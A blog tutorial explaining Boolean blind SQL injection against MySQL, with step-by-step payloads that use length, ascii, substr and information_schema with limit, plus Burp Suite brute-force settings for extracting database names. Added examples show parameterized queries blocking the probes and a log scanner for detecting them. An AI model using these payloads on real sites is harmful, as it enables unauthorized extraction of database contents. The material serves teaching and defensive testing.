Complete analysis of Boolean blind SQL injection

Injection principle

Boolean blind injection applies when the injection point gives no echo (the query result is never displayed). The principle is that the application evaluates a Boolean condition in the where ... and ... part of its query, so the outcome is either true or false, for example select * from admin where id=1 and 1=1. Normally the application only takes the value of the id parameter and splices it into the SQL statement it runs. Anyone who has used UNION-based injection knows that the original statement can be closed off so that the application executes the statement we supply; in the same way, by constructing statements whose result is true or false, we can deduce database content (database names, table names, column names, field values and so on) one answer at a time.
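To make the splicing concrete, an added example that is not from the original post: an in-memory SQLite table stands in for the MySQL admin table (SQLite's unicode() stands in for MySQL's ascii(), and the first name value stands in for database()). The same ?id= value is first spliced into the query text as the post describes, then bound as a parameter, which is the fix: the probe is then compared as data and can no longer change the truth of the WHERE clause.

```python
import sqlite3

# Constructed in-memory table standing in for the application's MySQL 'admin' table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE admin (id INTEGER, name TEXT);
    INSERT INTO admin VALUES (1, 'alice'), (2, 'bob');
""")

def vulnerable_lookup(user_id: str) -> bool:
    """Splices ?id= straight into the SQL text, as the post describes.
    True means the page would 'display normally' (a row came back)."""
    sql = f"SELECT * FROM admin WHERE id='{user_id}'"
    return conn.execute(sql).fetchone() is not None

def safe_lookup(user_id: str) -> bool:
    """Same query with the value bound as a parameter: it is compared as data,
    so any SQL appended to it never reaches the parser."""
    sql = "SELECT * FROM admin WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchone() is not None

# Probes in the shape the post uses: close the quote, AND a Boolean test, comment out the rest.
# SQLite has no database(), so the oracle here is the first admin name ('alice', 5 chars).
PROBE_LEN_5 = "1' and length((select name from admin limit 0,1))=5 -- "
PROBE_LEN_6 = "1' and length((select name from admin limit 0,1))=6 -- "
# unicode() is SQLite's equivalent of MySQL ascii(); 'a' is 97.
PROBE_CHAR_1 = "1' and unicode(substr((select name from admin limit 0,1),1,1))=97 -- "

def oracle_results(lookup) -> dict:
    """Run the three probes through a lookup function and collect the true/false answers."""
    return {
        "len=5": lookup(PROBE_LEN_5),
        "len=6": lookup(PROBE_LEN_6),
        "char1=97": lookup(PROBE_CHAR_1),
    }

if __name__ == "__main__":
    # Spliced: len=5 and char1=97 come back True, len=6 False, so the probe leaks one bit each.
    print("spliced:      ", oracle_results(vulnerable_lookup))
    # Parameterized: all False, because the whole probe is just an id that matches no row.
    print("parameterized:", oracle_results(safe_lookup))
```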

Actual combat utilization

Function interpretation

length()        //Returns the length of a string
substr(a,b,c)   //Takes c characters from string a, starting at position b
ascii()         //Converts a character to its ascii code; there are 128 ascii codes in total
left(a,b)       //Takes the first b characters from the left
regexp '^ro'    //Regular expression; this one means the first two characters are ro, same as like 'ro%'
ORD()           //Returns the ascii code of the first character of a string
MID(a,b,c)      //Same as substr(): takes c characters from string a, starting at position b


Basic use (length + ascii + substr)

1. Try to close the statement

?id=1' --+

2. Construct the poc
(1) Determine the length of the database name

?id=1' and length((select database()))=7 --+   //Page displays abnormally (condition is false)

?id=1' and length((select database()))=8 --+   //If the page displays normally, the current database name is 8 characters long

(2) Get the database name

?id=1' and ascii(substr((select database()),1,1))=1 --+    //Brute-force the two numbers here

Note on the brute-force type and parameters:

The first brute-forced parameter is the second argument of substr: the position within the query result, here the current database name.
The second brute-forced parameter is the ascii code of the character taken at that position; there are 128 ascii codes in total.

If the database name length was determined to be 8 in the first step, payload 1 runs from 1 to 8.

Payload 2 is the ascii code, from 1 to 128. [Start attack]

As shown in the figure above, ascii code 4 of the current database name has been brute-forced. The next step is to convert the codes to characters; a website that converts ascii codes in batch is handy here.

The current database name has now been obtained. For everything else, you only need to change the query statement in the first argument of the substr function.

Advanced use (length + ascii + substr + limit)

Whenever the query returns multiple rows, as opposed to the single value in the basic use above, you need the limit clause. The following shows how to query other table names or database names, just as with a UNION query; we can construct the poc directly.

1. Determine the length of every database name

?id=1' and length((select schema_name from information_schema.schemata))=1 --+
When you use this statement, an error is displayed saying that the subquery returns more than one row.

There are two ways to deal with this:
 Method 1: group_concat() collapses the queried rows into one line, which the system separates with commas automatically.
 Method 2: use limit to specify which row to query (my personal recommendation).

To return the first row, append limit 0,1 to the query statement.
 Similarly, to return the second row, append limit 1,1 to the query statement.

Still brute-force with Burp Suite's brute-force module.

We do not know how many databases the target system has, or how long the longest database name is; I use 20 by default.
20 databases is already quite a few, and database names as long as 20 characters are uncommon.
 So payload1 and payload2 are both set to 1 to 20, with a step of 1. [Start attack]

The results are in. From the brute-force results we can see that the system's MySQL has five databases!

2. Query all database names

?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=1 --+
When brute-forcing we could set three parameters at once, but filtering the results then becomes very messy,
 so we still brute-force two values at a time.

payload1 (position within the current database name, up to its length):
		first database: 1 to 10
		second database: 1 to 5
		third database: 1 to 18
		fourth database: 1 to 8
		fifth database: 1 to 3
payload2 (ascii code): 1 to 128, step 1

The ascii codes of the first database name have been obtained. Converting the ascii codes to characters is the same as before, so I won't repeat it.

To brute-force the name of the second database, only two things change:
First: limit 1,1
Second: the payload1 range becomes 1 to the length of the second database name

Further, table names, column names and field values are all enumerated in exactly the same way; no more examples are given here.
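From the defender's side, the probes above leave a recognisable shape in web server logs: one client, one path and parameter, and a run of requests that differ only in the number after length(...)= or ascii(substr(...))=. The following is an added example, not from the original post, that scans constructed common-log-format lines modelled on this post's payloads and reports clients whose probe count against a single parameter reaches a threshold. The sample lines, the /index.php path and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines modelled on the probes in this post (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2021:00:49:00 -0400] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [06/Nov/2021:00:49:01 -0400] "GET /index.php?id=1'%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [06/Nov/2021:00:49:02 -0400] "GET /index.php?id=1'%20and%20length((select%20database()))=7%20--+ HTTP/1.1" 200 417
10.0.0.5 - - [06/Nov/2021:00:49:03 -0400] "GET /index.php?id=1'%20and%20length((select%20database()))=8%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [06/Nov/2021:00:49:04 -0400] "GET /index.php?id=1'%20and%20ascii(substr((select%20database()),1,1))=115%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [06/Nov/2021:00:49:05 -0400] "GET /index.php?id=1'%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [06/Nov/2021:00:50:00 -0400] "GET /index.php?id=2 HTTP/1.1" 200 530
"""

# Common-log-format request line: the client IP, request target and status are what we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# The functions this post relies on, and the "function(...) = number" shape a Boolean probe takes.
PROBE_FUNCS = ("length(", "ascii(", "substr(", "ord(", "mid(", "left(")
COMPARE_RE = re.compile(r"(?:length|ascii|ord)\s*\(.*\)\s*=\s*\d+")

def classify_request(target: str):
    """Return (param, reason) when a query parameter carries a Boolean-blind probe, else None.
    parse_qs already URL-decodes, turning %20 and the trailing + into spaces."""
    for param, values in parse_qs(urlparse(target).query, keep_blank_values=True).items():
        for value in values:
            decoded = value.lower()
            if any(f in decoded for f in PROBE_FUNCS) and COMPARE_RE.search(decoded):
                return param, "function-compare"
            if "information_schema" in decoded:
                return param, "schema-enum"
    return None

def find_probe_bursts(log_text: str, threshold: int = 3) -> dict:
    """Count probes per (client, path, parameter). One probe yields a single true/false answer;
    extracting a name needs many near-identical requests, so the burst is the real signal."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["target"])
        if verdict:
            hits[(m["ip"], urlparse(m["target"]).path, verdict[0])] += 1
    return {key: n for key, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    for (ip, path, param), n in find_probe_bursts(SAMPLE_LOG).items():
        print(f"{ip} sent {n} Boolean-blind probes to {path} via ?{param}=")
```

A genuine extraction run produces hundreds of such requests per parameter, so in production the threshold is set well above the sample's value and the counter is keyed per time window.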


Boolean blind injection applies when the query data cannot be echoed normally. If the length, ascii and substr functions are blocked, the left, ORD and MID functions can be used instead. Boolean blind injection takes more time, and errors in the construction of the poc statements must be avoided.

Tags: Web Development Database SQL Cyber Security penetration test

Posted on Sat, 06 Nov 2021 00:49:00 -0400 by slak